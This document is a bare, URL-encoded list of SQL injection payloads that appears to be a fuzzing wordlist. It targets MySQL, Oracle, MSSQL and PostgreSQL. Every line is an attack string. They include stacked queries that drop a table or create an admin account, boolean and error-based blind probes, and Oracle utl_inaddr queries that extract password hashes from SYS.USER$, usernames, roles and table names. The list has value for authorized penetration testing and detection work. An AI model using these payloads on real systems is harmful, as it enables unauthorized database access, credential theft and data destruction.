'%20;%20drop%20table%20temp%20--
'%20||%20myappadmin.adduser('admin',%20'newpass')%20||%20'
%20AND%20(SELECT%204523%20FROM(SELECT%20COUNT(*),CONCAT(0x716a7a6a71,(SELECT%20(ELT(4523%3D4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
%20and%20(select%20substring(@@version,1,1))%3D'M'
%20and%20(select%20substring(@@version,1,1))%3D'X'
%20and%20(select%20substring(@@version,2,1))%3D'i'
%20and%20(select%20substring(@@version,2,1))%3D'y'
%20and%20(select%20substring(@@version,3,1))%3D'c'
%20and%20(select%20substring(@@version,3,1))%3D'S'
%20and%20(select%20substring(@@version,3,1))%3D'X'
%20AND%201%3D0
%20AND%201%3D0--%20
%20AND%201%3D0%20AND%20'%'%3D'
%20AND%201%3D0%23
%20AND%201%3D1
%20AND%201%3D1--%20
%20AND%201%3D1%20AND%20'%'%3D'
%20AND%201%3D1%23
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20banner%20FROM%20v$version%20WHERE%20ROWNUM%3D1))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(column_name))%20FROM%20sys.all_tab_columns))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(GRANTED_ROLE))%20FROM%20DBA_ROLE_PRIVS%20WHERE%20GRANTEE%3DSYS.LOGIN_USER))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(PASSWORD))%20FROM%20SYS.USER$))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(table_name))%20FROM%20sys.all_tables))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(USERNAME))%20FROM%20SYS.ALL_USERS))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT%3D1))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT%3D2))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT%3D3))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT%3D4))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT%3D5))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT%3D6))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT%3D7))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT%3D8))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE%3DSYS.LOGINUSER)%20WHERE%20LIMIT%3D1))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE%3DSYS.LOGINUSER)%20WHERE%20LIMIT%3D2))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE%3DSYS.LOGINUSER)%20WHERE%20LIMIT%3D3))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE%3DSYS.LOGINUSER)%20WHERE%20LIMIT%3D4))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE%3DSYS.LOGINUSER)%20WHERE%20LIMIT%3D5))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE%3DSYS.LOGINUSER)%20WHERE%20LIMIT%3D6))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE%3DSYS.LOGINUSER)%20WHERE%20LIMIT%3D7))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE%3DSYS.LOGINUSER)%20WHERE%20LIMIT%3D8))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT%3D1))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT%3D2))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT%3D3))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT%3D4))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT%3D5))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT%3D6))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT%3D7))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT%3D8))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT%3D1))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT%3D2))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT%3D3))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT%3D4))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT%3D5))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT%3D6))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT%3D7))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT%3D8))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT%3D1))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT%3D2))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT%3D3))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT%3D4))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT%3D5))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT%3D6))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT%3D7))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT%3D8))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20global_name%20FROM%20global_name))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20host_name%20FROM%20v$instance))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20SYS.DATABASE_NAME%20FROM%20DUAL))%20AND%20'i'%3D'i
'%20AND%201%3Dutl_inaddr.get_host_address((SELECT%20SYS.LOGIN_USER%20FROM%20DUAL))%20AND%20'i'%3D'i
%20AND%201083%3D1083%20AND%20(1427%3D1427
%20AND%201083%3D1083%20AND%20('1427%3D1427
%20AND%203516%3DCAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT%20(CASE%20WHEN%20(3516%3D3516)%20THEN%201%20ELSE%200%20END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113))%20AS%20NUMERIC)
%20AND%205650%3DCONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(106)%2BCHAR(122)%2BCHAR(106)%2BCHAR(113)%2B(SELECT%20(CASE%20WHEN%20(5650%3D5650)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(107)%2BCHAR(113)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(107)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(107)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(107)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(107)%2BCHAR(113)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(107)%2BCHAR(113)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)%2BCHAR(78)%2BCHAR(74)%2BCHAR(69)%2BCHAR(67)%2BCHAR(84)%2BCHAR(88)%2BCHAR(118)%2BCHAR(120)%2BCHAR(80)%2BCHAR(75)%2BCHAR(116)%2BCHAR(69)%2BCHAR(65)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(107)%2BCHAR(113)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))--%20
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))%23
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))
%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))--%20
